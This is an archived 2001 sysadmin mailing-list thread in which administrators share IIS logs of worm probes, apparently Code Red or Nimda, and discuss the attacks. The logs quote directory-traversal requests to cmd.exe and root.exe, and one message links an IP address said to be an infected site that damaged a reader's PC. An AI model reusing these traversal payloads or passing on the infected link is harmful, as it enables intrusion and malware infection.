Shannon -- What version and SP did you have of
Internet Explorer?
Higgins
-----Original Message-----
From: Shannon Speck [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 2:38 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
I, like a dumbass went to this site and it fried some
windows files and my pc wouldn't boot after that.
Luckily I dual boot two NTFS partitions so I was able
to come back up under XP and get all my data back.
Still had to reformat the W2k partition. Re-install
didn't work. Oh well, live and learn.
-----Original Message-----
From: David B. Lunn [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:34 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
Why would you put a link to an infected site? If
someone does not have
sept 18th patterns???? They will immediately be
infected???
-----Original Message-----
From: Martin Blackstone
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:19 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
Here is a site that has been hit
http://216.39.178.32
-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 7:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
CodeRed seems to have dwindled to nothing on my logs.
But it's being
replaced with the EXACT same lines you have below, and
they stay
consistent with the code red 2 methods of attacking
the more local
subnets.
Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert
Yes. It seems to be systems I have previously
monitored hitting me with
codered attacks. I bet someone is activating all of
their children.
Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert
All my public facing web servers at home and at my
office have shown a
huge continuous hacking activity. Has anyone seen
similar? I fear this
may be code red related or automated. Please comment
if you have seen
similar. Here is an excerpt from one logfile:
63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe
, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 97,
604, 404, 3, GET,
/scripts/..��../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe,
/c+dir, 63.101.9.107,
-, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0,
97, 604, 404, 3,
GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01,
10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404,
3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:32,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -,
9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -,
9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -,
9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -,
9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -,
9/18/01, 10:37:02,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET,
/scripts/root.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4,
DC1DIIS01,
x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe,
/c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -,
9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80,
604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:06,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -,
9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4,
DC1DIIS01, x.x.x.x, 0,
117, 0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4,
DC1DIIS01, x.x.x.x, 0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe
, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4,
DC1DIIS01, x.x.x.x, 15,
97, 604, 404, 3, GET,
/scripts/..��../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4,
DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -,
9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97,
604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604,
404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -,
9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -,
9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72,
604, 404, 3, GET,
/scripts/root.exe, /c+dir, 63.230.208.17, -, 9/18/01,
10:37:22, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET,
/MSADC/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -,
9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:28,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -,
9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe
, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 72,
604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.114.34.130, -, 9/18/01,
10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404,
3, GET,
/MSADC/root.exe, /c+dir, 63.114.34.130, -, 9/18/01,
10:39:37, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET,
/c/winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4,
DC1DIIS01, x.x.x.x,
0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe,
/c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe
, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4,
DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET,
/scripts/..��../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4,
DC1DIIS01, x.x.x.x, 16, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe,
/c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4,
DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -,
9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:44,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172,
41, 13973, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.114.34.130, -,
9/18/01, 10:39:45,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -,
9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential: This e-mail and any files transmitted
with it are the
property of Lanco International and/or its affiliates,
are confidential,
and are intended solely for the use of the individual
or entity to whom
this e-mail is addressed. If you are not one of the
named recipient(s)
or otherwise have reason to believe that you have
received this message
in error, please notify the sender at the above e-mail
address and
delete this message immediately from your computer.
Any other use,
retention, dissemination, forwarding, printing or
copying of this e-mail
is strictly prohibited.
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential: This e-mail and any files transmitted
with it are the
property of Lanco International and/or its affiliates,
are confidential,
and are intended solely for the use of the individual
or entity to whom
this e-mail is addressed. If you are not one of the
named recipient(s)
or otherwise have reason to believe that you have
received this message
in error, please notify the sender at the above e-mail
address and
delete this message immediately from your computer.
Any other use,
retention, dissemination, forwarding, printing or
copying of this e-mail
is strictly prohibited.
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
__________________________________________________
Terrorist Attacks on U.S. - How can you help?
Donate cash, emergency relief information
http://dailynews.yahoo.com/fc/US/Emergency_Information/
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
